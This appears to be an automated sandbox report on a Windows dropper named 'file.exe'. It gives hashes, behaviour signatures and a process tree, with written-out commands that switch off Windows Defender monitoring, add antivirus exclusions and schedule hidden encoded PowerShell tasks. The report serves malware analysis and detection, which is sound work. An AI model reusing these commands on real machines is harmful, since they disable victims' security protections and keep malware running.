Analysis
-
max time kernel
112s -
max time network
97s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
19-04-2023 18:34
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20230220-en
General
-
Target
file.exe
-
Size
7.2MB
-
MD5
9b2f88d0b9d260fdfbf606f19577308e
-
SHA1
d90da845541355034efc4480a5d97a211a03a745
-
SHA256
2e56d01448b731adb1b35fc72228af0efa4f10c254e03d914113702e6b2bdfd5
-
SHA512
bab68e67dfd309b94d744bcdb21968fb1810b942ab5cc131a1a61a3f6fd99e357cc28d17dc878ec6d9b57ae4b53708c40ac7e08c2a73393bc069609190eabe9b
-
SSDEEP
196608:91OLashz3FJ5/UI3hOxCHG7qn3+CYierPRURuWkcyvFYP:3OJhzVJNb393+5i8ZURuWPy+
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\scRiQJwYnZurGYzcC = "0" conhost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\gQwnIvOSfgVlPwgt = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths schtasks.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\xbGBeBqdnfmWSnEyoVR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\scRiQJwYnZurGYzcC = "0" conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\gQwnIvOSfgVlPwgt = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\MySKhCIAjPpVC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\PSrMLwgNU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\gQwnIvOSfgVlPwgt = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\HqWclUkqRTUn = "0" schtasks.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\uzjGIbOFKwqU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\HqWclUkqRTUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\MySKhCIAjPpVC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\xbGBeBqdnfmWSnEyoVR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\TePbsdUgyxbrNIVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\gQwnIvOSfgVlPwgt = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\PSrMLwgNU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\uzjGIbOFKwqU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\TePbsdUgyxbrNIVB = "0" reg.exe -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Executes dropped EXE 4 IoCs
pid Process 1356 Install.exe 780 Install.exe 484 IPKeTJc.exe 1416 OTVgAce.exe -
Loads dropped DLL 8 IoCs
pid Process 1488 file.exe 1356 Install.exe 1356 Install.exe 1356 Install.exe 1356 Install.exe 780 Install.exe 780 Install.exe 780 Install.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in System32 directory 8 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol IPKeTJc.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol IPKeTJc.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini IPKeTJc.exe -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files (x86)\PSrMLwgNU\pmfJsF.dll OTVgAce.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Tasks\pBhpQhEndrCBLmKcV.job schtasks.exe File created C:\Windows\Tasks\KlOugEwrPWYFNkY.job schtasks.exe File created C:\Windows\Tasks\bXdYnizyUUWLarOGTm.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1600 schtasks.exe 900 schtasks.exe 1724 schtasks.exe 1748 schtasks.exe 1844 schtasks.exe 1632 schtasks.exe 1888 schtasks.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 8 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe -
Suspicious behavior: EnumeratesProcesses 20 IoCs
pid Process 1904 powershell.EXE 1904 powershell.EXE 1904 powershell.EXE 952 powershell.EXE 952 powershell.EXE 952 powershell.EXE 1352 powershell.EXE 1352 powershell.EXE 1352 powershell.EXE 1628 powershell.EXE 1628 powershell.EXE 1628 powershell.EXE 1416 OTVgAce.exe 1416 OTVgAce.exe 1416 OTVgAce.exe 1416 OTVgAce.exe 1416 OTVgAce.exe 1416 OTVgAce.exe 1416 OTVgAce.exe 1416 OTVgAce.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1904 powershell.EXE Token: SeDebugPrivilege 952 powershell.EXE Token: SeDebugPrivilege 1352 powershell.EXE Token: SeDebugPrivilege 1628 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1488 wrote to memory of 1356 1488 file.exe 27 PID 1488 wrote to memory of 1356 1488 file.exe 27 PID 1488 wrote to memory of 1356 1488 file.exe 27 PID 1488 wrote to memory of 1356 1488 file.exe 27 PID 1488 wrote to memory of 1356 1488 file.exe 27 PID 1488 wrote to memory of 1356 1488 file.exe 27 PID 1488 wrote to memory of 1356 1488 file.exe 27 PID 1356 wrote to memory of 780 1356 Install.exe 28 PID 1356 wrote to memory of 780 1356 Install.exe 28 PID 1356 wrote to memory of 780 1356 Install.exe 28 PID 1356 wrote to memory of 780 1356 Install.exe 28 PID 1356 wrote to memory of 780 1356 Install.exe 28 PID 1356 wrote to memory of 780 1356 Install.exe 28 PID 1356 wrote to memory of 780 1356 Install.exe 28 PID 780 wrote to memory of 884 780 Install.exe 30 PID 780 wrote to memory of 884 780 Install.exe 30 PID 780 wrote to memory of 884 780 Install.exe 30 PID 780 wrote to memory of 884 780 Install.exe 30 PID 780 wrote to memory of 884 780 Install.exe 30 PID 780 wrote to memory of 884 780 Install.exe 30 PID 780 wrote to memory of 884 780 Install.exe 30 PID 780 wrote to memory of 1808 780 Install.exe 32 PID 780 wrote to memory of 1808 780 Install.exe 32 PID 780 wrote to memory of 1808 780 Install.exe 32 PID 780 wrote to memory of 1808 780 Install.exe 32 PID 780 wrote to memory of 1808 780 Install.exe 32 PID 780 wrote to memory of 1808 780 Install.exe 32 PID 780 wrote to memory of 1808 780 Install.exe 32 PID 884 wrote to memory of 1344 884 forfiles.exe 34 PID 884 wrote to memory of 1344 884 forfiles.exe 34 PID 884 wrote to memory of 1344 884 forfiles.exe 34 PID 884 wrote to memory of 1344 884 forfiles.exe 34 PID 884 wrote to memory of 1344 884 forfiles.exe 34 PID 884 wrote to memory of 1344 884 forfiles.exe 34 PID 884 wrote to memory of 1344 884 forfiles.exe 34 PID 1808 wrote to memory of 832 1808 forfiles.exe 35 PID 1808 wrote to memory of 832 1808 forfiles.exe 35 PID 1808 wrote to memory of 832 1808 forfiles.exe 35 PID 1808 wrote to memory of 832 1808 forfiles.exe 35 PID 1808 wrote to memory of 832 1808 forfiles.exe 35 PID 1808 wrote to memory of 832 1808 forfiles.exe 35 PID 1808 wrote to memory of 832 1808 forfiles.exe 35 PID 1344 wrote to memory of 1528 1344 cmd.exe 36 PID 1344 wrote to memory of 1528 1344 cmd.exe 36 PID 1344 wrote to memory of 1528 1344 cmd.exe 36 PID 1344 wrote to memory of 1528 1344 cmd.exe 36 PID 1344 wrote to memory of 1528 1344 cmd.exe 36 PID 1344 wrote to memory of 1528 1344 cmd.exe 36 PID 1344 wrote to memory of 1528 1344 cmd.exe 36 PID 832 wrote to memory of 1640 832 cmd.exe 37 PID 832 wrote to memory of 1640 832 cmd.exe 37 PID 832 wrote to memory of 1640 832 cmd.exe 37 PID 832 wrote to memory of 1640 832 cmd.exe 37 PID 832 wrote to memory of 1640 832 cmd.exe 37 PID 832 wrote to memory of 1640 832 cmd.exe 37 PID 832 wrote to memory of 1640 832 cmd.exe 37 PID 832 wrote to memory of 952 832 cmd.exe 38 PID 832 wrote to memory of 952 832 cmd.exe 38 PID 832 wrote to memory of 952 832 cmd.exe 38 PID 832 wrote to memory of 952 832 cmd.exe 38 PID 832 wrote to memory of 952 832 cmd.exe 38 PID 832 wrote to memory of 952 832 cmd.exe 38 PID 832 wrote to memory of 952 832 cmd.exe 38 PID 1344 wrote to memory of 1308 1344 cmd.exe 39
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1488 -
C:\Users\Admin\AppData\Local\Temp\7zS33AF.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1356 -
C:\Users\Admin\AppData\Local\Temp\7zS3785.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:780 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:884 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1344 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:1528
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:1308
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1808 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:832 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:1640
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:952
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gnASyuJhy" /SC once /ST 12:39:32 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:1844
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gnASyuJhy"4⤵PID:564
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gnASyuJhy"4⤵PID:1172
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bXdYnizyUUWLarOGTm" /SC once /ST 20:35:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\scRiQJwYnZurGYzcC\ZrLmggqzYyKemQH\IPKeTJc.exe\" en /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1632
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {0A3A62BC-947A-421C-B72A-A75EBCF8730F} S-1-5-21-3948302646-268491222-1934009652-1000:KXZDHPUW\Admin:Interactive:[1]1⤵PID:784
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1904 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1140
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:952 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:708
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1352 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1884
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1628 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:580
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1136
-
C:\Windows\system32\taskeng.exetaskeng.exe {91CFCACD-CA20-4248-9A72-D18F6779387D} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:928
-
C:\Users\Admin\AppData\Local\Temp\scRiQJwYnZurGYzcC\ZrLmggqzYyKemQH\IPKeTJc.exeC:\Users\Admin\AppData\Local\Temp\scRiQJwYnZurGYzcC\ZrLmggqzYyKemQH\IPKeTJc.exe en /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:484 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gCalvhNoL" /SC once /ST 13:00:14 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1888
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gCalvhNoL"3⤵PID:876
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gCalvhNoL"3⤵PID:1224
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:1548
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:1916
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1572
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:432
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gvksnJNkl" /SC once /ST 18:20:28 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1600
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gvksnJNkl"3⤵PID:996
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gvksnJNkl"3⤵PID:612
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gQwnIvOSfgVlPwgt" /t REG_DWORD /d 0 /reg:323⤵PID:844
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gQwnIvOSfgVlPwgt" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:888
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gQwnIvOSfgVlPwgt" /t REG_DWORD /d 0 /reg:643⤵PID:1216
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gQwnIvOSfgVlPwgt" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1108
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gQwnIvOSfgVlPwgt" /t REG_DWORD /d 0 /reg:323⤵PID:1768
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gQwnIvOSfgVlPwgt" /t REG_DWORD /d 0 /reg:324⤵PID:916
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gQwnIvOSfgVlPwgt" /t REG_DWORD /d 0 /reg:643⤵PID:568
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gQwnIvOSfgVlPwgt" /t REG_DWORD /d 0 /reg:644⤵PID:1416
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\gQwnIvOSfgVlPwgt\LsKuVZpV\yPcVUSemiNtNlCOC.wsf"3⤵PID:1212
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\gQwnIvOSfgVlPwgt\LsKuVZpV\yPcVUSemiNtNlCOC.wsf"3⤵
- Modifies data under HKEY_USERS
PID:432 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HqWclUkqRTUn" /t REG_DWORD /d 0 /reg:324⤵PID:900
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HqWclUkqRTUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1600
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MySKhCIAjPpVC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1592
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MySKhCIAjPpVC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:664
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PSrMLwgNU" /t REG_DWORD /d 0 /reg:324⤵PID:2044
-
-
